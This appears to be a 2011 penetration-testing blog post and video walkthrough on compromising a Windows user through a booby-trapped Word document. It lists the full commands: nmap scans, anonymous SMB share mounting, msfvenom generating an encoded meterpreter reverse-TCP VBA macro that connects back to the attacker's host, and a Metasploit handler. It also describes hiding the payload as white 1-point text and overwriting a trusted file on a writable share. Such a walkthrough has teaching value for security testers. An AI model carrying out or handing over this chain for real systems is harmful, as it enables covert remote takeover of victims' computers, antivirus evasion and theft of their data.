Metasploit vs Microsoft Office

Following on from the Adobe Reader post, another very common document format is Microsoft's Office Word (.doc). This screencast demonstrates how embedding an evil 'macro' into the document can lead to compromising the target's computer.

A macro is an 'automated shortcut' to repeat tasks, in this case, to generate a meterpreter payload and connect back to the attacker. Even though the payload can be encoded to by-pass anti-virus, Microsoft Word still could block it depending on the macro security level.

To infect the target, the attacker scans the network and finds an open shared folder, which they have read & write access to. Upon viewing the contents of the folder, the attacker notices a Word Document. However, presenting the infected file could be done a number of different ways, such as emailing the target instead of scanning & replacing.

Microsoft Office

Table of Contents

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Metasploit_Vs_Microsoft_Office.mp4

Tools

Metasploit – Download here. Can be found on BackTrack 5.
Microsoft Office - Can be bought from the online office store
Nmap - Download here. Can be found on BackTrack 5.
Samba - Download here. Can be found on BackTrack 5.
The attacker remotely controlled a 'test machine' using tightvnc which can be found on BackTrack 5. Download here.

Method

Scan network for active hosts (nmap)
Scan host for open ports (nmap)
Scan for any available shares (Samba)
Mount shared folder & view contents of it (Samba)
Copy document onto another (Windows) machine. (Samba)
Create macro & embed the payload (Metasploit)
Try & hide the 'modifications' (Office)
Replace the original document with the infected version (Samba)
Wait for target to open the file
Game Over

Commands

#apt-get install smbfs
nmap 192.168.0.* -n -sn
nmap 192.168.0.105 -T5 -sS   #-O -sV #-A #-sC -p- -v
smbclient -L \192.168.0.105 -N
mkdir /mnt/shared
smbmount //192.168.0.105/Documents /mnt/shared -o rw
cd /mnt/shared && ls -l

mkdir ../vnc
smbmount //192.168.0.105/write /mnt/vnc -o rw
cp SuperSecretStuff.doc ../vnc/

#apt-cache search openoffice.org-writer
#apt-get install openoffice.org-writer
#clear

ifconfig eth0   #hostname -I
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 -e shikata_ga_nai -i 3 -f vba > ../vnc/vba.txt   #js_le #vbs #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 ENCODING=shikata_ga_nai J > exploit

vncviewer 192.168.0.124
Notepad -> Open -> vba.txt
Microsoft Word -> Tools -> Macro -> Virtual Basic Editor
   Insert -> Module -> *Paste first half* -> Close
Microsoft Word -> Page break -> *Paste second half* -> Font Size: 1 -> Font Colour: White -> Save -> Close

cp ../vnc/SuperSecretStuff.doc ./
clear

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 E

Walkthrough

As the target has 'learnt their lesson' from 'new' opening email attachments from 'unknown' people, the attacker chooses to replace a 'trusted' file.

The attacker has already connected to the network and to starts to scan the network to see if there are any active hosts currently connected. After locating the target, the attacker scans the target to see which ports they have that are open. The results of the port scan shows that the target could be sharing a folder on the network. The attacker proceeds by searching for shared resources. The attacker attempts to access a shared folder as a guest, and when prompted for any credentials, leaves them blank. The attacker gets lucky and has access to an open & writeable folder! After listing the contents of the folder, notices it has a document in it...

Before the attacker clones the document, they mount a shared folder on a 'test machine' which they control. The reason for this is because the easiest way to inject a VBA macro is to use 'Microsoft Office' itself! The attacker then copies the targets document to the test machine.

Afterwards, the attacker generates the VBA macro, which will be injected into the cloned documents. When creating the macro, the attacker chooses to 'encode' the payload, which 'helps' bypass anti-virus - however this isn't essential as there isn't any installed!

Once the macro has been transferred to the test machine, the attacker remotely connects to the machine to control it. The first stage of the infected is to create a macro and place the first piece of the code which was generated into it. The second piece of code goes into the document itself. As having the code is very visible, the attacker decides to use the smallest font, therefore taking up the least amount of space. By setting the text colour to white, this is the same as the background colour that causes the text to appear to be invisible. The document is then saved and replaced over the original.

The attacker then sits back & relaxes until the target opens the 'new infected' document... which the target soon does =). However! Depending on Microsoft's Word security level, either the user is presented with a warning message asking to enable or disable macros, doesn't open the document at all or opens without question! As shown in the video.

Notes

This is my first video using BackTrack 5, by default KDE has semi-transparent konsole window. This caused 'poor' results when encoding.
Camtasia didn't record the VNC session that well, hence why there was a bit of lag in places.
Blip.TV has recently had a makeover and has updated their internal system for encoding. I believe the videos are now encoded at a lower quality, compared to previously uploaded.
In the current release of metasploit, I created a link to 'msfvenom' before recording by doing: ln -s /opt/framework3/msf3/msfvenom /usr/local/bin/msfvenom. Hopefully this will be fix/updated soon.
Before hand, I had instlaled smbfs. This is missing from the video, however you just need to run, apt-get install smbfs

Song: Lazee Feat. Neverstore - Hold On (Matrix Futurebound Terrace Tantrum Remix)

Video length: 5:39

Capture length: 10:04

Blog Post: https://blog.g0tmi1k.com/2011/06/metasploit-vs-microsoft-office/